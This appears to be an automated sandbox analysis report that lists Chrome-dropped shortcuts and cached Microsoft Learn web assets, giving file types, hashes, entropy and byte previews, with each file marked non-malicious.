Preview:	L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.i....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9881674188572043
Encrypted:	false
SSDEEP:	48:8d0dYsT9FsHzidAKZdA16ehDiZUkwqehuy+R:8dJsfMoy
MD5:	46EDD8589A4D1FBECFB2A36F7E18DBD3
SHA1:	EB870FA6440DD7103D1C16D43D5B059786A09D2F
SHA-256:	EBA76E20C9FB8B681869DC1ED4DE394C4855D81D2C677EE91EC7EF8E77CB6DB0
SHA-512:	77D75E9EE4DF318C465178AB59A4210D45EE9C081A7906A6D551AA6E9A99B884757864FB4F2510E12E410E910595EC4A66A36BEA9CDB9EF66ECD1D3841B59258
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....x..+.W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.i....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9797514331625203
Encrypted:	false
SSDEEP:	48:870dYsT9FsHzidAKZdA1UehBiZUk1W1qehEy+C:87Jsf89ky
MD5:	E422919D322DD12910621D9C1C860B45
SHA1:	A64ED25FCB3BD59278829D73CB6556C4F4084999
SHA-256:	07698EC76001D986FB15DF78209BDBD4F39CE44405CC98D1EAEC4862CB12BE07
SHA-512:	60B498504670128D683FDF9D7BEA8D06F4BB2E89E45B6EE3F574D1B003F7252118C805587994324C0971EA2D79DFBFA77D01572197E30ABFAA5CCF8EA0645BA0
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....E.+.W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.i....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9883319606825007
Encrypted:	false
SSDEEP:	48:8v0dYsT9FsHzidAKZdA1duTrehOuTbbiZUk5OjqehOuTbmy+yT+:8vJsf5TYTbxWOvTbmy7T
MD5:	D996F6AA3B8B40577D641FDC22F7C9DD
SHA1:	9B2644073AFC1A7589F61E0628700D8D32C9773E
SHA-256:	1D3A77513B2C907C63496A86CAA0D7A0542B130CD6C17A7B402CC83D3D64E9B5
SHA-512:	01DA3944D62CE12A091B95BAB655BDF280B5D1DDC5124BD12C3871C3C9BF0720AA702DDDCF6BE893B5E68BBEFF5FBBFBEE20AC6F1B978D8D741A2E1D137CE0A2
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......+.W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.i....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	dropped
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	dropped
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	downloaded
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	dropped
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
